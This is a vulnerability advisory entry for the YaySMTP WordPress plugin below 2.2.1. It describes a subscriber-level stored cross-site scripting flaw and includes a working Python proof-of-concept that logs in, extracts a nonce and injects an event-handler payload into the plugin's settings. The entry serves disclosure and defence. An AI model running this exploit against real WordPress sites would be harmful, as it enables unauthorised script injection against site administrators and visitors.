WordPress Plugin Vulnerabilities
YaySMTP < 2.2.1 - Subscriber+ Stored Cross-Site Scripting
Description
The plugin does not have proper authorisation when saving its settings, allowing users with a role as low as subscriber to change them, and use that to conduct Stored Cross-Site Scripting attack due to the lack of escaping in them as well.
v2.2.1 fixed the authorisation issue but not the escaping one. A separate issue has been created
Proof of Concept
# @author : 0xshdax (Rafshanzani Suhada) # @usage : python3 script.py http://localhost import requests, sys, re, json ## Setup here url = sys.argv[1] headers = { 'Content-Type': 'application/x-www-form-urlencoded' } username = 'guest' password = 'guest' regexnonce = r"\"ajaxNonce\":\"(.*?)(?:\",\"currentMailer\")" ## def loginWP(username, password, url): global regexnonce session = requests.Session() cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : url + '/wp-admin/', 'testcookie' : 1 } response = session.post(url + '/wp-login.php', cookies=cookies, data=data) responses = response.text findnonce = re.findall(regexnonce,responses) if not findnonce: print('[ * ] Nonce not found or invalid credentials. Please check again!') exit() else: print('[ * ] Success get nonce!') datalog = 'action=yaysmtp_save_settings&nonce=' + findnonce[0] + '&settings[fromEmail]=guest@localhost.id&settings[fromName]="autofocus onfocus=alert(/XSS/)// &settings[forceFromEmail]=1&settings[forceFromName]=0&settings[mailerProvider]=mail' getlogsmtp = session.post(url + '/wp-admin/admin-ajax.php', headers=headers, data=datalog) prettyjson = json.loads(getlogsmtp.text) print(json.dumps(prettyjson, indent=4)) print('[ * ] Trying to login user!') getnonce = loginWP(username, password, url)
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Rafshanzani Suhada
Submitter
Rafshanzani Suhada
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-07-18 (about 1 years ago)
Added
2022-07-18 (about 1 years ago)
Last Updated
2023-04-16 (about 1 years ago)